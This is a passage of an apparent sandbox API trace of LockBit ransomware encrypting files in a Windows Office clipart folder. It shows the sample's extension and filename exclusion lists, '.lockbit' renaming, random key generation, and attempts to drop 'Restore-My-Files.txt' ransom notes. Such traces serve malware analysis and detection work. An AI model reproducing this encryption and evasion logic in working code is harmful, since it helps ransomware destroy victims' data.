(lpString1=".sqlite", lpString2=".WMF") returned -1 [0165.088] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0165.088] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0165.088] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0165.088] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02413_.WMF.lockbit") returned 72 [0165.088] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02413_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02413_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0165.089] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0165.089] malloc (_Size=0x40068) returned 0x3f70048 [0165.089] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=10476) returned 1 [0165.089] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.090] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.090] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0165.090] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.090] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.090] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0165.090] ReadFile (in: hFile=0x2a8, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0165.102] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02413_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02413_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0165.102] malloc (_Size=0xa6) returned 0x1fa2ed8 [0165.102] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0165.104] free (_Block=0x1fa2ed8) [0165.104] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02413_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0165.104] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0165.104] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0165.104] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5951e930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xb24, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA02417_.WMF", cAlternateFileName="")) returned 1 [0165.104] lstrcmpiW (lpString1=".", lpString2="NA02417_.WMF") returned -1 [0165.104] lstrcmpiW (lpString1="..", lpString2="NA02417_.WMF") returned -1 [0165.104] PathFindExtensionW (pszPath="NA02417_.WMF") returned=".WMF" [0165.104] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0165.104] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0165.104] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0165.104] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0165.104] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0165.104] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0165.104] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0165.104] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0165.104] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0165.104] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0165.104] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0165.104] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0165.104] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0165.104] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0165.105] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0165.105] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0165.105] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0165.105] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0165.105] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0165.105] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0165.105] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0165.105] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0165.105] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0165.105] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0165.105] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0165.105] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0165.105] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0165.105] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0165.105] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0165.105] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0165.105] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0165.105] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0165.105] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0165.105] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0165.105] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0165.105] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0165.105] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0165.105] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0165.105] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0165.105] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0165.105] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0165.106] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0165.106] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0165.106] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0165.106] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0165.106] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0165.106] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0165.106] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA02417_.WMF") returned 1 [0165.106] lstrcmpiW (lpString1="ntldr", lpString2="NA02417_.WMF") returned 1 [0165.106] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA02417_.WMF") returned 1 [0165.106] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA02417_.WMF") returned -1 [0165.106] lstrcmpiW (lpString1="autorun.inf", lpString2="NA02417_.WMF") returned -1 [0165.106] lstrcmpiW (lpString1="thumbs.db", lpString2="NA02417_.WMF") returned 1 [0165.106] lstrcmpiW (lpString1="iconcache.db", lpString2="NA02417_.WMF") returned -1 [0165.106] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0165.106] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02417_.WMF") returned=".WMF" [0165.106] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0165.106] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0165.106] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0165.106] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0165.106] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0165.106] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0165.106] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0165.106] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0165.106] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0165.106] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0165.106] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0165.107] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0165.107] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0165.107] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0165.107] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0165.107] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0165.107] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0165.107] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0165.107] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0165.107] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0165.107] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0165.107] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0165.107] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0165.107] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0165.107] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0165.107] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0165.107] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0165.107] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0165.107] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02417_.WMF.lockbit") returned 72 [0165.107] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02417_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02417_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0165.108] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0165.108] malloc (_Size=0x40068) returned 0x3df0008 [0165.108] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2852) returned 1 [0165.108] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.109] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.109] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0165.109] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.109] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.109] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0165.109] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0165.111] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02417_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02417_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0165.111] malloc (_Size=0xa6) returned 0x1fa2ed8 [0165.111] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0165.112] free (_Block=0x1fa2ed8) [0165.112] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02417_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0165.112] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0165.112] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0165.112] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6a396cf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2fb8, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA02423_.WMF", cAlternateFileName="")) returned 1 [0165.112] lstrcmpiW (lpString1=".", lpString2="NA02423_.WMF") returned -1 [0165.112] lstrcmpiW (lpString1="..", lpString2="NA02423_.WMF") returned -1 [0165.112] PathFindExtensionW (pszPath="NA02423_.WMF") returned=".WMF" [0165.112] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0165.112] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0165.112] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0165.112] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0165.112] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0165.112] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0165.113] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0165.113] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0165.113] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0165.113] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0165.113] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0165.113] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0165.113] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0165.113] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0165.113] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0165.113] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0165.113] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0165.113] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0165.113] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0165.113] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0165.113] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0165.113] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0165.113] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0165.113] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0165.113] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0165.113] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0165.113] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0165.113] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0165.113] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0165.113] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0165.113] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0165.113] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0165.113] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0165.113] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0165.114] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0165.114] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0165.114] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0165.114] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0165.114] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0165.114] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0165.114] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0165.114] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0165.114] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0165.114] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0165.114] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0165.114] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0165.114] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0165.114] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA02423_.WMF") returned 1 [0165.114] lstrcmpiW (lpString1="ntldr", lpString2="NA02423_.WMF") returned 1 [0165.114] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA02423_.WMF") returned 1 [0165.114] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA02423_.WMF") returned -1 [0165.114] lstrcmpiW (lpString1="autorun.inf", lpString2="NA02423_.WMF") returned -1 [0165.114] lstrcmpiW (lpString1="thumbs.db", lpString2="NA02423_.WMF") returned 1 [0165.114] lstrcmpiW (lpString1="iconcache.db", lpString2="NA02423_.WMF") returned -1 [0165.114] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0165.114] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02423_.WMF") returned=".WMF" [0165.114] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0165.114] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0165.114] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0165.114] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0165.114] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0165.115] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0165.115] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0165.115] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0165.115] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0165.115] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0165.115] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0165.115] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0165.115] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0165.115] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0165.115] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0165.115] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0165.115] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0165.115] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0165.115] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0165.115] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0165.115] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0165.115] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0165.115] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0165.115] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0165.115] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0165.115] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0165.115] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0165.115] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0165.115] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02423_.WMF.lockbit") returned 72 [0165.115] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02423_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02423_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0165.116] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0165.116] malloc (_Size=0x40068) returned 0x1ff1e60 [0165.116] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=12216) returned 1 [0165.116] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.117] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.117] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0165.117] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.117] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.117] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0165.117] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0165.120] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02423_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02423_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0165.121] malloc (_Size=0xa6) returned 0x1fa2ed8 [0165.121] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0165.121] free (_Block=0x1fa2ed8) [0165.121] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02423_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0165.121] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0165.122] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0165.122] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x59544a90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x53c, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA02424_.WMF", cAlternateFileName="")) returned 1 [0165.122] lstrcmpiW (lpString1=".", lpString2="NA02424_.WMF") returned -1 [0165.122] lstrcmpiW (lpString1="..", lpString2="NA02424_.WMF") returned -1 [0165.122] PathFindExtensionW (pszPath="NA02424_.WMF") returned=".WMF" [0165.122] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0165.122] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0165.122] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0165.122] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0165.122] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0165.122] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0165.122] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0165.122] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0165.122] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0165.122] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0165.122] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0165.122] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0165.122] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0165.122] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0165.122] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0165.122] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0165.122] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0165.122] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0165.123] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0165.123] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0165.123] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0165.123] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0165.123] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0165.123] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0165.123] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0165.123] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0165.123] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0165.123] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0165.123] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 